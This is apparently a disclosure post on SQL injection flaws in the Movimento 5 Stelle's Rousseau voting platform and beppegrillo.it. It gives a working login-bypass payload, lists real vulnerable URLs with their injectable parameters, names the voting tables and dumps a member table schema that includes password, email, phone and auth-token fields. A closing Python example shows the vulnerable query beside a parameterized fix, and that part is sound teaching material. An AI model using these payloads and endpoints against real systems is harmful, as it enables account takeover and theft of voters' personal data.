A simple SQL injection is all that is needed to log in as *any* user.
example: ' or '1'='1.
https://rousseau.movimento5stelle.it/login.php
SQL injection where sharing_id is a table in the GROUP BY clause.
https://rousseau.movimento5stelle.it/edit_atto.php?id=1258&sharing_id=[sqli]
http://www.beppegrillo.it/marcia_virtuale/vmarcia/auslesen.php?start=14040&z=[sqli]
"Fixed" - Update 09/08/2017:
They removed from BeppeGrillo.it the "Marcia virtuale" page and the PHP file that exposed the data in clear text (https://t.co/3FeUPiHQ8E) pic.twitter.com/8abp2ItTxa (David Puente, @DavidPuente, August 9, 2017)
I accidentally found (August 2018) an archived page (I didn't archive it!) that shows sensitive information without an SQLi. Probably the page was tampered with by someone or the script itself didn't work correctly.
https://archive.li/cmKkC
-
Sample for the voting system: voting_votazioni, voting_votazioni_vote
The main website also runs Movable Type 4, which has vulnerabilities.
Sample columns:
author_federated_id | author_federated_video | author_federated_comune_id | author_federated_candidato | author_federated_regione_id | author_federated_profile_id | author_federated_external_id | author_federated_provincia_id | author_federated_userpic_asset_id | author_federated_candidato_europa | author_federated_candidato_comune | author_federated_circoscrizione_id | author_federated_candidato_regione | author_federated_eletto_a_comune_id | author_federated_circoscrizione_europa_id | author_federated_circoscrizione_europa_regione_id | author_federated_circoscrizione_europa_provincia_id | author_federated_cv | author_federated_url | author_federated_name | author_federated_hint | author_federated_nome | author_federated_type | author_federated_sesso | author_federated_email | author_federated_eletto | author_federated_meetup | author_federated_status | author_federated_nazione | author_federated_twitter | author_federated_cognome | author_federated_esp_pol | author_federated_citta_1 | author_federated_citta_2 | author_federated_basename | author_federated_nickname | author_federated_linkedin | author_federated_facebook | author_federated_password | author_federated_immagine | author_federated_attivismo | author_federated_auth_type | author_federated_cellulare | author_federated_created_on | author_federated_created_by | author_federated_public_key | author_federated_modified_on | author_federated_entry_prefs | author_federated_professione | author_federated_text_format | author_federated_modified_by | author_federated_can_view_log | author_federated_citta_nato_a | author_federated_is_superuser | author_federated_personalsite | author_federated_api_password | author_federated_presentazione | author_federated_eletto_comune | author_federated_citta_mapping | author_federated_eletto_europa | author_federated_eletto_regione | author_federated_citta_eletto_a | author_federated_can_create_blog | author_federated_data_di_nascita | author_federated_titolo_di_studio | author_federated_remote_auth_token | author_federated_preferred_language | author_federated_scadenza_documento | author_federated_remote_auth_username | author_federated_citta_zona_municipio | author_federated_sms_check_code_status | author_federated_sindaco_consigliere_provincia
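The login bypass and the GROUP BY injection described above, as an added example that is not the site's own code: it uses Python's sqlite3 as a stand-in for the PHP back end and shows the concatenated query beside the parameterized one. The tables, columns and function names are hypothetical, as is the assumption that the request value ends up as an identifier in GROUP BY.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    # Plaintext passwords only keep the demo short.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'correct-horse'), ('bob', 'hunter2');
        CREATE TABLE atti (id INTEGER, sharing_id INTEGER, author TEXT);
        INSERT INTO atti VALUES (1, 10, 'alice'), (2, 10, 'bob'), (3, 11, 'bob');
    """)
    return db

def login_vulnerable(db, name, password):
    # Input is concatenated into the statement, so a quote in `password`
    # rewrites the WHERE clause: (name AND password) OR '1'='1'.
    sql = ("SELECT name FROM users WHERE name = '" + name +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_safe(db, name, password):
    # Bound parameters are always treated as data, never as SQL text.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchone() is not None

# Identifiers (such as a GROUP BY column) cannot be bound as parameters,
# so the request value is mapped onto a fixed allow-list instead.
GROUP_COLUMNS = {"sharing_id": "sharing_id", "author": "author"}

def count_by(db, group_param):
    column = GROUP_COLUMNS.get(group_param)
    if column is None:
        raise ValueError("unsupported grouping column")
    sql = f"SELECT {column}, COUNT(*) FROM atti GROUP BY {column} ORDER BY {column}"
    return db.execute(sql).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"  # the string quoted in the post
    print("concatenated query accepts payload:", login_vulnerable(db, "alice", payload))
    print("parameterized query accepts payload:", login_safe(db, "alice", payload))
    print("grouped counts:", count_by(db, "sharing_id"))
```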